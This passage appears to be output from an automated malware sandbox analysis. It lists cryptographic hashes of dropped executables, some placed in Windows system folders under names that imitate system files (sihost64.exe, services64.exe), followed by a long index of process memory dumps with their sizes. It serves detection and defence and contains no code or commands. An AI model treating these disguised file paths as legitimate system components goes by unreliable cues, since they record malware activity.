a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Windows\System32\Microsoft\Libs\sihost64.exe

MD5
3721b324b4d2c9dea6c6bc6a858fe337

SHA1
f3391c6414ed5bb89acc4ab5df2b837077a9a9c6

SHA256
fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206

SHA512
bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

Download Submit
\Windows\System32\services64.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
memory/580-76-0x000000001B206000-0x000000001B207000-memory.dmp

Filesize
4KB

Download
memory/580-75-0x000000001B204000-0x000000001B206000-memory.dmp

Filesize
8KB

Download
memory/580-74-0x000000001B4A0000-0x000000001B6C0000-memory.dmp

Filesize
2.1MB

Download
memory/580-78-0x000000001B207000-0x000000001B208000-memory.dmp

Filesize
4KB

Download
memory/580-73-0x000000001B202000-0x000000001B204000-memory.dmp

Filesize
8KB

Download
memory/580-68-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

Filesize
9.9MB

Download
memory/580-66-0x0000000000110000-0x0000000000331000-memory.dmp

Filesize
2.1MB

Download
memory/960-120-0x000000001B870000-0x000000001BB6F000-memory.dmp

Filesize
3.0MB

Download
memory/960-110-0x000007FEEC1A0000-0x000007FEECCFD000-memory.dmp

Filesize
11.4MB

Download
memory/960-116-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
memory/960-117-0x00000000028B0000-0x00000000028B2000-memory.dmp

Filesize
8KB

Download
memory/960-118-0x00000000028B2000-0x00000000028B4000-memory.dmp

Filesize
8KB

Download
memory/960-119-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/960-121-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1060-154-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1060-159-0x000000001A8B4000-0x000000001A8B6000-memory.dmp

Filesize
8KB

Download
memory/1060-151-0x0000000001B20000-0x0000000001B26000-memory.dmp

Filesize
24KB

Download
memory/1060-162-0x000000001A8B7000-0x000000001A8B8000-memory.dmp

Filesize
4KB

Download
memory/1060-157-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-161-0x000000001A8B6000-0x000000001A8B7000-memory.dmp

Filesize
4KB

Download
memory/1060-158-0x000000001A8B2000-0x000000001A8B4000-memory.dmp

Filesize
8KB

Download
memory/1168-69-0x0000000073E30000-0x00000000743DB000-memory.dmp

Filesize
5.7MB

Download
memory/1168-70-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/1168-71-0x0000000073E30000-0x00000000743DB000-memory.dmp

Filesize
5.7MB

Download
memory/1288-67-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

Filesize
9.9MB

Download
memory/1288-72-0x00000000001A0000-0x00000000001EA000-memory.dmp

Filesize
296KB

Download
memory/1288-77-0x000000001B150000-0x000000001B152000-memory.dmp

Filesize
8KB

Download
memory/1412-114-0x00000000003E6000-0x00000000003E7000-memory.dmp

Filesize
4KB

Download
memory/1412-113-0x00000000003E4000-0x00000000003E6000-memory.dmp

Filesize
8KB

Download
memory/1412-115-0x00000000003E7000-0x00000000003E8000-memory.dmp

Filesize
4KB

Download
memory/1412-112-0x00000000003E2000-0x00000000003E4000-memory.dmp

Filesize
8KB

Download
memory/1412-111-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

Filesize
9.9MB

Download
memory/1452-152-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-136-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-141-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-163-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-165-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-144-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-139-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-156-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-147-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-149-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-123-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-131-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-127-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1452-167-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1612-101-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/1612-97-0x000007FEEC6E0000-0x000007FEED23D000-memory.dmp

Filesize
11.4MB

Download
memory/1612-98-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1612-99-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

Filesize
9.6MB

Download
memory/1612-100-0x0000000002520000-0x0000000002522000-memory.dmp

Filesize
8KB

Download
memory/1612-103-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

Filesize
9.6MB

Download
memory/1612-102-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download
memory/1616-132-0x0000000002590000-0x0000000002592000-memory.dmp

Filesize
8KB

Download
memory/1616-128-0x000007FEEC6E0000-0x000007FEED23D000-memory.dmp

Filesize
11.4MB

Download
memory/1616-142-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1616-137-0x0000000002594000-0x0000000002597000-memory.dmp

Filesize
12KB

Download
memory/1616-146-0x000000000259B000-0x00000000025BA000-memory.dmp

Filesize
124KB

Download
memory/1616-134-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

Filesize
9.6MB

Download
memory/1616-135-0x0000000002592000-0x0000000002594000-memory.dmp

Filesize
8KB

Download
memory/1616-130-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

Filesize
9.6MB

Download
memory/1668-96-0x0000000002F60000-0x0000000002F61000-memory.dmp

Filesize
4KB

Download
memory/1668-95-0x0000000073E30000-0x00000000743DB000-memory.dmp

Filesize
5.7MB

Download
memory/1968-54-0x0000000000400000-0x000000000093C000-memory.dmp

Filesize
5.2MB

Download
memory/1968-55-0x0000000075C31000-0x0000000075C33000-memory.dmp

Filesize
8KB

Download
memory/2004-86-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/2004-85-0x000000001B7E0000-0x000000001BADF000-memory.dmp

Filesize
3.0MB

Download
memory/2004-80-0x000007FEEC1A0000-0x000007FEECCFD000-memory.dmp

Filesize
11.4MB

Download
memory/2004-84-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/2004-83-0x00000000028F2000-0x00000000028F4000-memory.dmp

Filesize
8KB

Download
memory/2004-81-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

Filesize
9.6MB

Download
memory/2004-82-0x00000000028F0000-0x00000000028F2000-memory.dmp

Filesize
8KB

Download
memory/2004-79-0x000007FEFB711000-0x000007FEFB713000-memory.dmp

Filesize
8KB

Download